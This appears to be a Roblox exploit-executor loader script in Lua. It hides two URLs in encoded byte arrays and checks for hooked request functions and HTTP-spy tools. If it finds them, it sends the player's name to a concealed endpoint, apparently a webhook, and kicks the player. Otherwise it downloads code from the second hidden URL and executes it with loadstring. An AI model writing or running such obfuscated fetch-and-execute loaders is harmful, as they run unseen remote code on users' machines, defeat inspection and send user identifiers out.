local function _D(d, o)
    local r = ""
    for i = 1, #d do r = r .. string.char(d[i] - i - o) end
    return r
end

local _AL = _D({138, 151, 152, 149, 153, 97, 87, 88, 127, 137, 148, 126, 139, 143, 130, 77, 126, 139, 138, 77, 128, 144, 138, 81, 154, 137, 135, 142, 150, 151, 148, 157, 90, 93, 98, 95, 104, 100, 97, 107, 108, 101, 106, 103, 108, 112, 113, 111, 116, 115, 117, 118, 110, 179, 184, 118, 166, 185, 156, 182, 140, 117, 156, 124, 158, 162, 166, 150, 156, 128, 195, 131, 160, 167, 154, 172, 205, 185, 145, 178, 196, 168, 192, 163, 190, 197, 177, 198, 181, 145, 183, 221, 216, 224, 207, 193, 188, 165, 161, 209, 183, 192, 212, 213, 197, 231, 217, 166, 169, 202, 240, 221, 209, 213, 240, 197, 182, 183, 194, 233, 228}, 33)
local _G1 = _D({138, 151, 152, 149, 153, 97, 87, 88, 156, 140, 163, 91, 149, 152, 164, 153, 167, 149, 169, 168, 155, 169, 155, 168, 168, 175, 161, 171, 178, 109, 163, 176, 175, 114, 178, 166, 192, 168, 186, 180, 191, 190, 123, 191, 190, 182, 127, 190, 179, 188, 194, 132, 187, 184, 203, 210, 136, 199, 209, 190}, 33)

local _L = game:GetService("Players").LocalPlayer
local _req = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request

local function _SC()
    if not _req then return false end
    local ok, info = pcall(debug.getinfo, _req)
    if ok and info and info.source ~= "=[C]" then return "ERR_ENV" end
    for _, v in ipairs({"HttpSpy", "SimpleSpy", "VGG Spy"}) do if getgenv()[v] then return "ERR_DEB" end end
    return false
end

local _err = _SC()
if _err then
    pcall(function()
        _req({Url = _AL, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game:GetService("HttpService"):JSONEncode({content = "Violation: ".._L.Name.." | ".._err})})
    end)
    _L:Kick("Security: "..tostring(_err))
    return
end

getgenv()._NK_SIGNAL = "NK_" .. game:GetService("HttpService"):GenerateGUID(false)
local s, c = pcall(function() return game:HttpGet(_G1) end)
if s and c then
    local f = loadstring(c)
    if f then pcall(f) end
else
    _L:Kick("Connection Fail")
end
